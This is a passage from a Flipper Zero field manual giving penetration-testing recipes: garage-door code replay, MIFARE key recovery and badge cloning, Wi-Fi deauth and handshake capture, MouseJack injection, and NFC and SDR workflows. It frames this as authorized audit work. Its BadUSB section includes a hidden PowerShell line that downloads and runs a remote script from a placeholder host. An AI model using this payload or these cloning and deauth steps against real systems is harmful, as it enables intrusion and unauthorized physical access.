Comments ▾
Figures ▾
Tables ▾

Flipper Zero · Volume 11

Flipper Zero Volume 11 — Workflows & Recipes

End-to-end field recipes — garage-door analysis, RFID badge audit, BLE keyboard pentest, NFC tag programming, SDR companion mode

11.1 About this Volume

The previous volumes covered subsystems in isolation. This volume combines them into complete field workflows — start to finish, with the firmware, the modules, and the companion tools (HackRF, RTL-SDR, phone, Kali laptop, Bus Pirate when relevant) all in their right places.

Each recipe assumes:

  • The lab loadout (multiple Flippers, official WiFi Devboard + Marauder, VGM, NRF24, external CC1101 amp, Game Over, AWOK V3).
  • Momentum mainline as primary firmware.
  • Lab discipline: own the equipment or have written authorization.
Figure 1 — A Flipper Zero on the bench, ready for an end-to-end field workflow. Photo: Antoine RJ Wright/Flickr.
Figure 1 — A Flipper Zero on the bench, ready for an end-to-end field workflow. Photo: Antoine RJ Wright/Flickr.

11.2 Garage-Door Audit (Sub-GHz)

Use case: assess whether a garage door / gate uses static codes (insecure) or rolling codes (modern), and clone if static.

11.2.1 Recon

1. Stand 1 m from the receiver.
2. Sub-GHz → Frequency Analyzer.
3. Press the OEM remote. Note the strongest frequency.
   - 300-315 MHz → US-market (most pre-2010)
   - 433.92 MHz → EU + worldwide modern
   - 868 MHz → European modern
4. If RSSI < -60 dBm, move closer.

11.2.2 Capture

5. Sub-GHz → Read.
6. Press the OEM remote at the captured frequency.
7. Read what the parser says:
   - "Princeton" / "CAME" / "NICE FLO" / "Linear MegaCode" / "Holtek HT12" →
     STATIC code. Clone via Save → Send.
   - "KeeLoq" / "Hörmann (BiSecur)" / "BFT Mitto" / "FAAC SLH" →
     ROLLING code. The decoded value is good for ONE transmission.
   - "RAW" parse → fall through. Try Read RAW.

11.2.3 Replay (static codes only)

8. Save → name (MyGarage).
9. Sub-GHz → Saved → MyGarage → Send.
   The Flipper transmits the captured code. Door opens.
   Range: 5-10 m onboard, 70-150 m with external CC1101 amp.

11.2.4 Rolling-code reality

Modern garage openers (post-2014, most LiftMaster, Genie, Hörmann, Nice, etc.) use rolling codes that the Flipper can capture and decode but cannot meaningfully replay. The receiver expects the next sequence; replaying a captured one is rejected.

Some attacks against specific rolling-code implementations exist (e.g., RollJam against certain pre-2018 systems), but they require either a second device (a jammer + capture rig) or specific implementation weaknesses — out of scope for casual Flipper use, and on owned doors only.

11.2.5 Documentation

For an audit deliverable, capture:

  • Frequency
  • Modulation (OOK / FSK)
  • Protocol (parser output)
  • Code length (bits)
  • Whether static or rolling
  • Replay-success/fail

The captured .sub file pulled to a PC has all this in plaintext.

11.3 RFID Badge Audit (LF + HF)

Use case: assess what type of access cards a facility uses, attempt clone + replay on owned cards.

11.3.1 Identify the card type

Both LF and HF readers may share a single physical reader. Try LF first (more common in older systems):

1. RFID → Read → press card to side of Flipper.
   If parsed → EM4100 / HID Prox / Indala / etc. Note format.
   If no parse → not LF, or LF but unknown format. Try HF.

2. NFC → Read → press card to back of Flipper.
   If parsed → MIFARE Classic 1k/4k / NTAG / DESFire / etc.
   If parse fails partway → MIFARE Classic with non-default keys.
   Run the Mfkey32 / nested workflow.

11.3.2 Mfkey32 / nested

For MIFARE Classic with unknown sector keys:

1. NFC → Read → save what's readable as <name>.nfc.
2. NFC → Saved → <name> → Detect Reader.
   The Flipper now emulates the partial card to a real reader.
3. Wave the Flipper at the reader. Each auth attempt is captured.
4. After 10-30 captures, NFC → Saved → <name> → Mfkey32:
   the keys recovered get appended to <name>.nfc.
5. Re-read the card; previously-locked sectors now decrypt.

For nested attack against cards where one key is known:

1. Confirm one sector key known (often the default A0A1A2A3A4A5
   factory key on sector 0).
2. NFC → Saved → <name> → Nested.
3. Other sector keys are recovered in seconds.

11.3.3 Clone to magic card / T5577

LF (125 kHz):
  RFID → Saved → <name> → Write
  Press a blank T5577 card → wait 1-2 sec → cloned.

HF (13.56 MHz):
  NFC → Saved → <name> → Write (Magic)
  Press a magic card (Gen 1A / 1B / 2 / 3 / 4) → cloned.

11.3.4 Reporting

For an audit report:

  • Card type (e.g., “MIFARE Classic 1k, 16 sectors, 5 sectors using factory key A0A1A2A3A4A5, 11 sectors using custom keys”)
  • Clone success/failure
  • Recommendation: “Cards are vulnerable to mfkey32. Migrate to DESFire EV2 or higher.”

11.4 IR Universal-Remote Build for an Unfamiliar Device

Use case: lost the OEM remote for a 12-year-old projector; need to control it from the Flipper.

1. Find any working remote: phone IR app, original remote, vendor
   support.
2. Infrared → Learn New Remote → start with empty file.
3. For each button:
   - Add Button → press original remote at the Flipper's IR receiver.
   - Wait for parse (NEC / Sony SIRC / RC5 / RC6 / Kaseikyo / Samsung).
   - If raw, accept the raw timings.
   - Name the button (Power, VolumeUp, ChannelDown, INPUT, MENU, OK,
     UP, DOWN, LEFT, RIGHT, BACK).
4. Save as /ext/infrared/Projector.ir.
5. Open with XRemote FAP for grid layout.
6. Push to phone via Mobile App if you want both interchangeable.

A complete remote is typically 12–20 buttons captured. Most TV / projector / AV-receiver remotes use NEC at 38 kHz, so even raw fallback usually works.

For 30+ ft range, attach the Rabbit-Labs IR Blaster (Vol 9 §3.2) and configure External GPIO routing per Vol 6 §2.7.

11.5 BadUSB Keyboard Pentest

Use case: deliver a payload via the Flipper as a USB keyboard.

11.5.1 Test on owned hardware first

1. /ext/badusb/test.txt:
     DELAY 2000
     GUI r              ; Win+R
     DELAY 500
     STRING notepad
     ENTER
     DELAY 1000
     STRINGLN BadUSB self-test
2. Plug into your own laptop, run.
3. Verify the layout is right (US default; for non-US keyboard, swap
   in BadUSB → Settings → Layout).

11.5.2 Real payload structure

Typical attack pattern (against owned hardware!):

DELAY 5000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "$u='http://example.invalid/p.ps1';iex(irm $u)"
ENTER

Realistic latencies: target a 5-second initial DELAY (gives slow machines time to register the new HID device), 500 ms inter-keypress delays for unreliable targets.

11.5.3 BLE BadKB (no USB cable)

If physical insertion is impossible:

1. Momentum: BadUSB → Settings → Connection → BLE.
2. Pair the Flipper as a BLE keyboard to the target machine
   (target needs to be in pairing mode).
3. Run the script over BLE.

Slower than USB (each character has a BLE keyboard report; ~10ms each) but no cable.

11.5.4 Caveat (important)

Stock OFW Flipper BadUSB enumerates with USB VID identifying it as Flipper Zero. Endpoint inspection on a target reveals the device name. For stealth scenarios where the target machine has device-ID allowlisting, the Flipper is identifiable; a Hak5 Rubber Ducky (which identifies as a generic USB HID) would not be.

Custom firmwares can spoof descriptors, but this changes the legal calculus — masquerading as another device is a different liability than “bring an obvious tool”.

11.6 Wi-Fi Audit with WiFi Devboard + Marauder

Use case: enumerate Wi-Fi APs, capture handshakes for offline cracking.

11.6.1 Setup

1. WiFi Devboard plugged in via USB-C side.
2. Apps → GPIO → WiFi Marauder. Wait for UART connection ("Marauder vX.Y").
3. Optional: configure target AP allowlist via "Set Target".

11.6.2 Recon

4. "Sniff Beacon" — runs a beacon-probe scan, dumps APs with SSID, BSSID,
   channel, RSSI, encryption.
5. "Sniff Probe" — dumps client probe requests; identifies clients
   roaming for known SSIDs (potential evil-portal targets).
6. "Sniff Pwned" — passive WPA handshake capture as clients connect.

11.6.3 Active capture (deauth + handshake)

7. "Attack" → "Deauth" → pick AP → start.
   Clients drop, reconnect, EAPOL handshake captured.
8. Pull the handshake .pcap from the Devboard's microSD (or from the
   Flipper's SD if Marauder writes it there).

Where to break the handshake: not on the Flipper. Pull the .pcap to a real machine, run hashcat or aircrack-ng against a wordlist. The Flipper’s M4 doesn’t have the cycles.

11.6.4 5 GHz / Wi-Fi 6

WiFi Devboard is 2.4 GHz only. For 5 GHz, swap to Apex 5 (Vol 9 §2.4).

Deauth = FCC Part 15 violation in the US (jamming). Sustained TX of deauth frames is enforcement-grade illegal. Lab use into a Faraday cage / RF-shielded room only. See _shared/legal_ethics.md.

11.7 NRF24 / MouseJack

Use case: identify a vulnerable wireless keyboard/mouse and inject keystrokes.

1. NRF24 module plugged in (Vol 8 §4.3 pinout).
2. Apps → GPIO → Mousejacker. Pick "Sniff" → walk around the target
   environment.
   Sniffer reports BSSID, channel, vendor signature (Logitech Unifying,
   Microsoft 2.4G, etc.).
3. If a vulnerable device is detected, "Attack" → pick injection
   payload (a Ducky-script-like sequence).
4. Stand near the receiver dongle (~5-10 m on bare NRF24, 100m+ with
   PA+LNA module). Send.
5. Keystrokes appear as if from the legitimate keyboard.

Affected devices include older Logitech Unifying receivers (pre-2016 firmware), various clone keyboards, and some industrial wireless HID. Modern (2018+) Logitech firmware patched this.

11.8 SDR Companion Mode (HackRF / RTL-SDR + Flipper)

Use case: when you need a feature the Flipper can’t do (wideband spectrum analysis, IQ recording, modulation reverse-engineering) but the field tool you have is the Flipper.

11.8.1 The pattern

The Flipper is the field instrument: pocketable, on-device UI, captures one channel at a time on a known protocol. The HackRF or RTL-SDR is the lab tool: connected to a computer, sees the entire band, records IQ for offline analysis.

Workflow:

1. With the Flipper:
   - Frequency Analyzer to find the carrier.
   - Read RAW to capture timings.
2. Observe what's captured doesn't match a known parser.
3. Pull out the RTL-SDR + laptop:
   - Run GQRX or SDR++ at the captured frequency.
   - Watch the spectrum to identify the modulation visually.
   - Record IQ samples.
4. Open IQ in URH (Universal Radio Hacker):
   - Demodulate, identify symbol rate.
   - Identify the framing.
   - Reconstruct the protocol structure.
5. Back to the Flipper:
   - Write a custom parser (FAP) that handles this new protocol, or
   - Find the right preset to register-tune the CC1101 to.

This is exactly the use case _shared/comparison.md outlines: Flipper for known protocols in the field, HackRF/RTL-SDR for unknown protocols in the lab.

11.8.2 Specific recipes (cross-reference uConsole and HackRF subprojects)

For HackRF + GNU Radio: see ../HackRF One/03-outputs/ for workflows when those volumes are populated.

For deeper SDR work on the uConsole as a portable Linux box: see ../Clockwork uConsole/03-outputs/uConsole_Vol09_RF_SDR_Workflows.docx.

11.9 NFC Tag Programming (NTAG)

Use case: program NDEF data into NFC tags for use cases like business cards, smart-home triggers, Amiibo-equivalents.

1. NFC → Read → press blank NTAG (typically NTAG 215 for Amiibo;
   NTAG 213 for short URLs).
2. Save as Template.nfc.
3. Pull off the Flipper, edit /ext/nfc/Template.nfc on a PC. Specifically
   the NDEF data section.
4. Push back to the Flipper.
5. NFC → Saved → Template → Write → press blank tag.
6. Verify with phone NFC scanner — tag should fire the URL or trigger.

For Amiibo specifically: pull a .nfc of an existing Amiibo (Amiibo files are widely shared online though legality varies — check yours), write to a fresh NTAG 215. Note: modern Switch firmware has implemented anti-clone checks against some Amiibo, so a fresh-cloned NTAG 215 may be rejected by current games.

11.10 iButton Read + Clone

Quick recipe for completeness:

1. iButton → Read → touch the iButton key against the side pad.
2. Save as MyKey.ibtn.
3. iButton → Saved → MyKey → Emulate → touch the Flipper side pad to
   the reader pad.

For permanent clones, write to a blank DS1990A iButton via an iButton writer FAP (separate from this workflow).

11.11 qFlipper + Mobile App Workflow

The optimal “reach for the Flipper from any computer” pattern:

On phone (Flipper Mobile App, Android first-class, iOS limited):
  - Browse Flipper SD via BLE
  - Push files (IR remotes, captures) between phone and Flipper
  - Trigger Read / Emulate from phone
  - Crowdsourced IR remotes library

On laptop (qFlipper / Web Updater at lab.flipper.net):
  - Firmware management (install, repair, recovery)
  - Direct file copy at USB speed (much faster than BLE)
  - Live console / serial CLI
  - Bulk file management

For multiple Flippers, qFlipper handles them one at a time. Open the right qFlipper instance for each device; the device serial number identifies which.

11.12 Multi-Tool Synthesis: A Realistic Field Day

A realistic multi-tool field day:

Pelican case opens. Inventory:
  - Flipper Zero #1 (VGM stack, primary)
  - Flipper Zero #2 (Game Over stack, multi-radio)
  - WiFi Devboard (Marauder)
  - External CC1101 amp + tuned 433/868 MHz antenna
  - HackRF One + dipole + 1090 collinear (when bought)
  - Clockwork uConsole (Kali, full toolchain)

Job: Audit a small office.

  1. Walk in with Flipper #1 (default Momentum). Open Sub-GHz Frequency
     Analyzer. Walk room — note any sub-GHz transmitters.
  2. Switch to Flipper #2 with Game Over. Open Marauder via Flipper.
     "Sniff Beacon" — capture every 2.4 GHz AP in the building.
  3. Note BSSID/SSID/channel/encryption, save .pcap.
  4. RFID/NFC near the badge reader. Capture badge type with Flipper #1.
  5. (If authorized) clone target badge to magic card, verify access.
  6. Pull out HackRF + uConsole. Park outside. Run gqrx wideband
     across 800-1100 MHz to sniff cellular/IoT traffic.
  7. Back at the lab: import .pcap into Wireshark, .sub files into
     URH, RFID dump into mfkey32. Document in a report.

The Flipper handles the on-device, in-the-moment captures. The HackRF

  • uConsole handles the wideband + decode. Both are in the same Pelican case — they’re complementary, not competing.

11.13 Common Workflow Pitfalls

Table 1 — 13. Common Workflow Pitfalls

PitfallSymptomFix
Trying to replay a rolling codeDoor doesn’t openIdentify rolling-code; abandon replay; consider out-of-band approach
Capturing too far from a sub-GHz emitterWeak / partial decodeMove within 1 m; or use external amp + tuned antenna
BadUSB script not typingLayout mismatchBadUSB → Settings → Layout = match target keyboard
Marauder can’t see APsWi-Fi device not in monitor modeConfirm Marauder is running on the Devboard; Flipper just reports
Mfkey32 captures nothingReader uses random nonce + already-fetched keymfkey32 is reader-dependent; try a different reader if available
NFC tag clones write but reader rejectsReader checks UID type / anti-collisionTry a magic card of different generation (Gen 1A/1B/2/3/4)
GPS module never gets a fixAntenna shielded; ceramic patch in pocketMove to clear sky; consider external active antenna

11.14 What’s next

Vol 12 — Cheatsheet. The print/laminate one-pager set — GPIO pinout, sub-GHz protocols, NFC card types, BadUSB DuckyScript, JS API, BLE re-pair, DFU recovery, firmware-switch SD layout. Carry it.

Comments (0)

  1. Loading…

Comments are held for moderation — nothing appears until approved.